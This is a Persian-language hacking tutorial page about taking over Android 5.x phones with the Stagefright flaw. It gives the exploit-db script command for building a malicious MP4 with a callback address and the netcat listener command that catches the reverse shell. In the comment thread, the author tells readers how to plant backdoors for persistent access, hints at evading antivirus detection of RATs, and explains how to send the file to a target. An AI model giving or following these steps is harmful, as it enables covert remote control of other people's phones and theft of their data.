نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

نفوذ به اندروید

اموزش نفوذ به اندروید فقط با ارسال یک ویدیو (فرمت MP4) و با استفاده از اسیب پذیری Stagefright با ما در ادامه این اموزش هک و امنیت همراه باشید

نفوذ به اندروید با ارسال ویدیو و امنیت

سیستم عامل اندروید یکی از بهترین و محبوب ترین سیستم عامل های موبایل در جهان است به همین دلیل متخصصان امنیتی زیادی
بر روی امنیت اندروید کار میکنند اما اسیب پذیری هایی وجود دارند که بعد از انتشار اخرین نسخه منتشر میشوند تا هر چه سریع تر نسبت به رفع ان اقدام شود
بسیاری بعد از تهیه دستگاه اندرویدی خود اقدام به اپدیت و رفع این اسیب پذیری ها نمیکنند
یا شرکت های تولید کننده اپدیتی برای دستگاه قدیمی یا جدید ارائه نمیدهند 
پس اسیب پذیری در بسیاری از دستگاه ها باقی میمانند و هکرا با استفاده از ان حفره های امنیتی اقدام به نفوذ میکنند
یکی از این اسیب پذیری های خطرناک به نام Stagefright است که نفوذگر میتواند با ارسال یک ویدیو به کاربر دسترسی کنترل از راه ذور بگیرد 
که در ادامه با نحوه استفاده با این حفذره امنیتی اشنا میشوید
 

اسیب پذیری Stagefright

Stagefright یک حفره امنیتی در سیستم عامل اندرید از نوع باگ RCE است 
که همانطور که گفته شد با اجرای یک فایل ویدیو ای با پسورند .mp4 دسترسی کنترل از راه دور به نفوذگر میدهد
اکسپلویت این اسیب پذیری به صورت عمومی منتشر شده است و میتواند اندروید 5.0 < 5.1.1 را مورد نفوذ قرار دهد
میتوانید فایل اکسپلویت را از اخر اموزش به صورت مستقیم دانلود کنید یا از سایت exploit-db.com دریافت کنید
نکته : در این اموزش برای نفوذ به اندروید از لینوکس استفاده میکنیم اما میتوانید با نصب پایتون در هر سیستم عاملی مانند ویندوز استفاده کنید
وارد ترمینال شوید و به مسیری که فایل پایتون اکسپلویت را قرار داده اید بروید
حال اکسپلویت را اجرا کنید تا سویچ ها و راهنمای ان را ببینید

python 38124.py

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو

ساخت فایل الوده MP4

حال برای ساخت فایل ویدیو ای الوده به دستور زیر توجه کنید

python 38124.py -c 127.0.0.1 -p 6060 -o PentestCore.mp4

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو


با استفاده از python فایل اکسپلویت 38124.py را اجرا کرده ایم 
با سویچ -c ادرس ip سرور خود که میخواهید اتصال دستگاه کلاینت به ان برقرار شود را وارد کنید
یک پورت شبکه را برای اتصال به دلخواه انتخاب کنید ما با استفاده از سویچ -p پورت 6060 را انتخاب کرده ایم
و برای گرفتن خروجی سویچ -o را وارد کنید و سپس نام فایل را با فرمت .mp4 وارد کنید
که ما PentestCore.mp4 وارد کرده ایم این فایل خروجی است که باید به کلاینت خود بدهید تا اجرا کنید
بعد از اجرا فایل ساخته شده توسط کاربر نفوذ به اندروید انجام شده و اتصال به سرور شما بر قرار میشود 
برای برقراری این اتصال باید پورت 6060 را که انتخاب کرده بودید در سرور خود باز کنید و منتظر اجرای ویدیو توسط کلاینت شوید 
NC ابزاری مناسب برای باز کردن پورت است که در کالی لینوکس به صورت پیشفرض وجود دارد 
میتوانید اموزش استفاده از نت کت (nc) را در PentestCore مشاهده کنید
در nc را با سویچ های زیر اجرا کنید تا پروت مورد نظر شما بر روی سیسستم باز شود

nc -v -l -p 6060

نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو


بعد از اجرای فایل ویدو ای دستگاه به صورت ریموت به سرور شما از طریق nc متصل میشود و میتوانید دستورات خود را بر روی دستگاه وارد کنید
 

آموزش ویدیو ای

دریافت لینک دانلود



[ برای درافت فایل وارد شوید و یا ثبت نام کنید! ]

پسورد : pentestcore.com

امیدواریم از این اموزش نفوذ به اندروید لذت برده باشید
موفق باشید. 

4/5 (3 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های امنیت شبکه و راه های مقابله با نفوذ ، در 7 سال گذشته متمرکز بر مباحث روز امنیت سایبری بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

۴۲ دیدگاه در “نفوذ به اندروید با ارسال ویدیو (MP4) + ویدیو”

  • سینا نادری اسفند 26, 1397 پاسخ

    سلام یه سوال داشتم در رابطه با رات های اندرویدی
    آیا راهی هست که گوشی نتونه رات رو شناسایی کنه چون هنگام نصب رات مثل اسپای نوت گوشی پیغام میده که برنامه مخربه و به دستگاه آسیب میزنه

    • Nima Nani اسفند 28, 1397 پاسخ

      درود
      بله راه هایی وجود دارد که باید برنامه نویسی بلد باشید و تغیراتی در کد نویسی فایل دهید

  • milani97 اسفند 27, 1397 پاسخ

    سلام من مراحل بالا رو به ترتیب انجام دادم ولی وقتی دستور sudo python 38124.py رو اجرا میکنم خطای زیر رو نشون میده
    با ابونتو البته تست کردم
    File “38124.py”, line 8
    SyntaxError: Non-ASCII character ‘\xe2’ in file 38124.py on line 8, but no encoding declared; see python. org/dev/peps/pep-0263/ for details

    • Nima Nani اسفند 28, 1397 پاسخ

      درود
      فایل را به صورت مستقیم از PentestCore دریافت کنید و نام ان را به mp4.py تغیر بدین مشکل حل میشود
      اموزش ویدیو ای را حتما مشاهده کنید تمام این نکات گفته شده
      موفق باشید

  • rootkali52 اسفند 28, 1397 پاسخ

    سلام خسته نباشید.. همون چیزایی که گفتید انجام دادم ولی کار نکرد.. برا طرفم فرستادم

    • Nima Nani اسفند 28, 1397 پاسخ

      درود تشکر از شما
      احتمالا دستگاه اندرویدی طرف مقابل شما از اندروید ۵ استفاده نمیکند داخل اموزش گفته شده دقیقا چه نسخه هایی از اندروید این اسیب پذیری را دارند
      و یا احتمالا مشکل ip دارید باید از سرور مجازی استفاده کنید یا پورت فورواردیتگ انجام دهید

  • 563694 اردیبهشت 3, 1398 پاسخ

    سلام اموزش رو نمیشه با تروموکس انجام داد؟

    • Nima Nani اردیبهشت 6, 1398 پاسخ

      درود
      اگر مشکل اتصال نداشته باشید میتوانید داخل ترموکس هم انجام دهید

  • علی اردیبهشت 5, 1398 پاسخ

    این برای لینوکسه توی تروموکس نمیشه ازش استفاده کرد؟؟؟؟

    • Nima Nani اردیبهشت 6, 1398 پاسخ

      درود
      اگر مشکل شبکه و اتصال نداشته باشید میتوانید در ترموکس هم انجام دهید

  • 563694 اردیبهشت 8, 1398 پاسخ

    سلام داداش منظورت از (مشکل شبکه و اتصال نداشته باشید) چیه؟ برای استفاده در تروموکس؟

    • Nima Nani اردیبهشت 12, 1398 پاسخ

      درود
      شما باید ای پی ثابت داشته باشید و شبکه شما به صورت bridge باشد که در دستگاه های خانگی به این صورت نمیباشد

  • Root خرداد 20, 1398 پاسخ

    سلام و خسته نباشید میخواستم بدونم کد کی بخوام از داخل گوشی اون کسی که هک شده بکشم بیرون چجوری باید تو لینوکس وارد کنم ممنون میشم جوابم را بدید

    • Nima Nani تیر 20, 1398 پاسخ

      درود
      بعد از دسترسی میتوانید بکدور خود را بریزید و دسترسی کامل بگیرید. منظورتون از کد خیلی ناواضح است

  • علی تیر 15, 1398 پاسخ

    سلام ببخشید چطور میشه اتصال رو بعد از خاموش کردن کالی حفظ کرد

    • Nima Nani تیر 20, 1398 پاسخ

      درود
      میتوانید برای اتصال دائم یک بکدور بر روی دستگاه بگذارید تا بتوانید به صورتی که میخواهید با هر سیستمی متصل شوید

  • mohammad تیر 30, 1398 پاسخ

    سلام خسته نباشید .
    میشه ازتون خواهش کنم که آموزش کامل مرحله به مرحله تا زمانیکه اتصال دائم میگیرید رو اموزش بدید.مبحث پورت فورواردینگ و بکدور خیلی مهمه
    ایا میشه از Ngrok برای پورت فورواردینگ استفاده کرد و اینکه اگه میشه از کدوم حالت http یاtcp
    واینکه این باگ هنوزم کار میکنه حتی اگه نسخه اندروید ۵ یا ۵.۱ باشه

    • Nima Nani مرداد 26, 1398 پاسخ

      درود تشکر
      بله در صورت امکان این اموزش را قرار خواهیم داد
      بله این باگ در نسخه های پچ نشده اندروید ۵ و ۵.۱ همچنان کار میکند

  • omid99924 بهمن 19, 1398 پاسخ

    سلام مهندس برای آموزش بالا سرور از کجا گیر بیاریم

    • نیما حسینی بهمن 19, 1398 پاسخ

      درود می توانید از وب سایت اول سرور ، سرور مجازی تهیه کنید :
      AvalServer.com

  • kolak اسفند 22, 1398 پاسخ

    رمز فایل چنده؟

    • نیما حسینی فروردین 1, 1399 پاسخ

      درود
      پسورد فایل : pentestcore.com

  • شفیع فروردین 19, 1399 پاسخ

    سلام بعد مرحله nc وقت که c را وارد میکنم forward host lookup fild:unknown host نوشته میشه

    • نیما حسینی فروردین 23, 1399 پاسخ

      درود
      داخل سرور مجازی این کار را انجام دهید تا اتصال شما به صورت Bridge باشد.

  • Mobinfff6565 اردیبهشت 25, 1399 پاسخ

    با سلام و عرض خسته نباشید من یک سوال داشتم توی ترموکس تمام مراحلو میرم ولی وقتی کد
    nc -v -l -p 6060
    را که وارد میکنم خودم میزنم رو فایل mp4 و میام توی ترموکس ترموکس هیچ تغییری نمیکنه و همون نوشته listening on [any] 6060 هستش من الان چیکار کنم این درست بشه؟

    • نیما حسینی اردیبهشت 30, 1399 پاسخ

      درود
      احتمالا دستگاه شما اسیب پذیر نیست ، باید بر روی دستگاه اسیب پذیر تست کنید.

  • Mobinfff اردیبهشت 27, 1399 پاسخ

    سلام خسته نباشید من قسمت اخر مشکل دارم وقتی میزنم رو فایل mp4 هیچی برام تو ترموکس نمیاد و دوم اینکه روشی هست که بشه با ای پی یا شماره تلفن هک کرد؟
    با تشکر از سایت خوبتون

    • نیما حسینی اردیبهشت 30, 1399 پاسخ

      درود تشکر
      دستگاه باید اسیب پذیر باشد تا این روش عمل کند.
      بله ، اموزش های مختلفی در این زمینه ها داخل سایت قرار دارد که با کمی جستجو می توانید ان ها را مشاهده کنید ، در صورتی که پیدا نکردید بفرمایید تا لینک ارسال شود.

  • nAhmad خرداد 11, 1399 پاسخ

    درود
    مهندس خسته نباشید

    میشه که کاری کرد که از نسخه های پایین تر و بالاتر اندروید هم دسترسی گرفت مثلاً با خاموش کردن سپر امنیتی گوگل پلی ممنون میشم

    ممنون از سایت خوبتون موفق باشید 🌹

    • نیما حسینی خرداد 16, 1399 پاسخ

      درود بر شما تشکر
      خیر متاسفانه این روش فقط بر روی نسخه های اسیب پذیر جواب می دهد.

  • s.javan2005 شهریور 14, 1399 پاسخ

    سلام
    میشه لینک آموزش نفوذ با شماره تماس رو بدید
    من نتونستم اونو پیداش کنم

    • نیما حسینی شهریور 15, 1399 پاسخ

      درود
      اموزشی با این عنوان داخل سایت نداریم.

  • دهقانی آبان 30, 1399 پاسخ

    این برنامه سیستم ما رو تخریب نمیکنه
    بعد تمام اطلاعات گوشی برای ما قابل دسترسی هست

    • نیما حسینی آذر 7, 1399 پاسخ

      درود
      خیر اما در محیط مجازی ساز استفاده کنید اگر خیلی حساس هستید
      مورد دوم هم بله تا حدودی.

  • سبحان آذر 19, 1399 پاسخ

    سلام خسته نباشید
    می‌خواستم بدونم وقتی این فیلم الوده توسط فرد باز میشه ایا اجرا و قابل پخش است یا خیر
    و اینکه روشی هست که فیلم الوده ای ساخت که به اندروید ۴.۴.٢ نفوذ کند?
    ممنون میشم پاسخ بدین…

    • نیما حسینی آذر 21, 1399 پاسخ

      درود و تشکر
      این آسیب‌پذیری فقط در نسخه های گفته شده قابل استفاده است برای استفاده در نسخه های دیگر باید آسیب پذیری های دیگری پیدا شود.
      فایل آلوده قابل پخش نخواهد بود.

  • سعید بهمن 2, 1399 پاسخ

    سلام
    خسته نباشید
    ممنون بابت اطلاعات مفیدتون
    یه سوال داشتم
    میشه فایل روطوری طراحی کردکه همه اسیب پذیری های نسخه های مختلف اندرویدتوش باشه?مثلاهم این اسیب پذیری که تواندروید۵هست توش باشه هم ی اسیب پذیری مربوط به اندرویدهای پایین تر(به طورهمزمان)
    واینکه راهی هست که ویدئوباوجودالوده بودن به ویروس قابل اجراباشه و پخش بشه توگوشیه قربانی?
    ممنون میشم کمکم کنید
    🌷🌷

  • سعید بهمن 3, 1399 پاسخ

    سلام وخسته نباشیدمجدد
    میخواستم بدونم اموزشی مبنی برساخت فیلم الوده به ویروس رت (Rat)
    ندارید?
    ایااین اموزشی ک گذاشتین همون اموزش ساخت فیلم الوده به راته?اگه فرق دارن لطفایااموزش ساخت فیلم الوده به ویروس رات رو بزارین یا بفرمایید که همچین فیلمی توهمه نسخه های اندروید کارمیکنه ?ایافیلم قابل پخش است?
    باتشکرفراوان اززحمات تیمتون

  • Ali تیر 21, 1400 پاسخ

    سلام به چه چیز هایی دسترسی پیدا میکنیم وقتی فایل Mp4 را به فرد بفرستیم ؟؟

    • پن‌تست‌کور مرداد 10, 1400 پاسخ

      درود
      دسترسی کامل از طریق کامند.

  • 123Farnam اردیبهشت 2, 1401 پاسخ

    برای تست نفوذ اندروید ۱۰ چه چیزی رو باید اضافه یا تغییر دهیم؟چون این تست که تو فیلم هست برای اندروید پایین جواب میده.

  • aria889 بهمن 20, 1401 پاسخ

    سلام موقع ای که میخوام فایل بسازم این ارور میاد

    Traceback (most recent call last):
    File “/storage/emulated/0/hack/mp4.py”, line 390, in
    data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File “/storage/emulated/0/hack/mp4.py”, line 205, in create_mp4
    ftyp += struct.pack(‘>L’, 0)
    TypeError: can only concatenate str (not “bytes”) to str

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
دوره کالی لینوکس
نماد های اعتماد
نماد های اعتماد